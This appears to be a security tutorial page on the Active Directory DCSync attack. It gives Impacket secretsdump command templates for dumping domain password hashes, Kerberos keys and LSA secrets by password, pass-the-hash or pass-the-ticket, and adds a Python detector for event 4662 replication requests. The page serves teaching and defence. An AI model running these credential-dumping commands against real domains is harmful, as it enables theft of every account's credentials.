DCSync
How to find sensitive data using a DCSync.
A DCSync is similar to dumping the NTDS.dit file. However, rather than copying NTDS.dit and extracting data from it, DCSync uses the Directory Replication Service (DRSUAPI) API to ask the domain controller to replicate the domain's data, the same way a second domain controller would.
To perform this attack, domain administrator privileges are required, or a user who holds both of the replication extended rights DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object.
The easiest way to perform a DCSync is to use secretsdump.
secretsdump.py, from Impacket, implements several techniques for dumping password hashes and secrets, and DCSync is one of them.
DCSync using a plaintext password
secretsdump -outputfile 'data' <DOMAIN>/<USER>:<PASSWORD>@<DOMAINCONTROLLER>
DCSync using Pass-the-Hash
secretsdump -outputfile 'data' -hashes <LMhash>:<NThash> <DOMAIN>/<USER>@<DOMAINCONTROLLER>
DCSync using Pass-the-Ticket (the ticket is read from the credential cache named by KRB5CCNAME, so the domain controller must be given by hostname, not IP address; -no-pass stops secretsdump from prompting for a password)
secretsdump -k -no-pass -outputfile 'data' <DOMAIN>/<USER>@<DOMAINCONTROLLER>
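The replication rights named above are also what a DCSync is audited against. With the Directory Service Access audit subcategory enabled, every replication request a domain controller serves is logged as Security event 4662, and the Properties field of that event lists the control-access-right GUIDs that were exercised; a request carrying the DS-Replication-Get-Changes GUIDs from anything other than a domain controller (or a known replication service account) is the signature of secretsdump's DCSync. The following is an added defender's example, not code from the original page or from Impacket: it represents 4662 records as dicts of their XML fields (constructed sample data, not captured events) and flags replication requests by principals outside an allowlist. The allowlist, the account names and the object names are assumptions.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Set

# Control-access-right GUIDs of the replication extended rights. These are the
# GUIDs that event 4662 lists in its Properties field when the right is used.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS: Set[str] = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET,
}

# The Properties field is free text such as "{guid}\n\t{guid}"; pull out the GUIDs.
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.IGNORECASE)


@dataclass(frozen=True)
class Alert:
    subject: str          # DOMAIN\user that issued the replication request
    rights: tuple         # replication GUIDs found in the event
    object_name: str      # directory object the request was made against


def replication_rights_in(properties: str) -> Set[str]:
    """Return the replication-right GUIDs present in a 4662 Properties field."""
    found = {g.lower() for g in GUID_RE.findall(properties)}
    return found & REPLICATION_RIGHTS


def detect_dcsync(events: Iterable[dict], allowed_replicators: Iterable[str]) -> List[Alert]:
    """Return one Alert per 4662 event where a non-allowlisted principal used replication rights.

    allowed_replicators holds DOMAIN\\account names of the domain controllers' computer
    accounts and any service accounts that legitimately replicate (assumption: the
    defender maintains this list; compare case-insensitively).
    """
    allowed = {a.lower() for a in allowed_replicators}
    alerts: List[Alert] = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue                      # only directory-service access events matter here
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue                      # an ordinary object read, not replication
        subject = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}"
        if subject.lower() in allowed:
            continue                      # expected DC-to-DC replication
        alerts.append(Alert(subject, tuple(sorted(rights)), ev.get("ObjectName", "")))
    return alerts


# Constructed sample records (not real logs); field names follow the 4662 XML schema.
BOTH_RIGHTS = "{%s}\n\t{%s}" % (DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL)
SAMPLE_EVENTS = [
    # A real domain controller replicating: expected, must not alert.
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "DC02$",
     "ObjectName": "DC=corp,DC=example", "Properties": BOTH_RIGHTS},
    # A user account exercising both replication rights: the DCSync pattern.
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",
     "ObjectName": "DC=corp,DC=example", "Properties": BOTH_RIGHTS},
    # The same user reading an object with an unrelated (constructed) property GUID.
    {"EventID": 4662, "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",
     "ObjectName": "CN=jdoe,CN=Users,DC=corp,DC=example",
     "Properties": "{00000000-0000-0000-0000-000000000001}"},
    # A logon event, ignored by the detector.
    {"EventID": 4624, "SubjectDomainName": "CORP", "SubjectUserName": "jdoe"},
]
ALLOWED_REPLICATORS = ["CORP\\DC01$", "CORP\\DC02$"]   # assumed domain controllers


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS, ALLOWED_REPLICATORS):
        print(f"possible DCSync by {alert.subject} against {alert.object_name}: {alert.rights}")
```

The allowlist is what keeps this usable in production: domain controllers replicate constantly and also match the GUIDs, so the detector keys on who made the request rather than on the event alone. Non-DC accounts that legitimately hold the rights (directory synchronisation or backup services) belong in the same list, and anything else on it deserves a look at the domain object's ACL.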
secretsdump writes the following files, named after the -outputfile prefix:
.ntds: LM and NT password hashes, one account per line, which can be used with hash cracking.
.cleartext: passwords of accounts that store them with reversible encryption.
.kerberos: Kerberos keys (DES, AES128 and AES256).
.sam: the domain controller's SAM secrets.
.secrets: the domain controller's LSA secrets.
The .sam and .secrets files do not come from replication: secretsdump collects them through the remote registry service, so they are only produced when the account is also an administrator on the domain controller. Pass -just-dc to limit the run to the replicated data.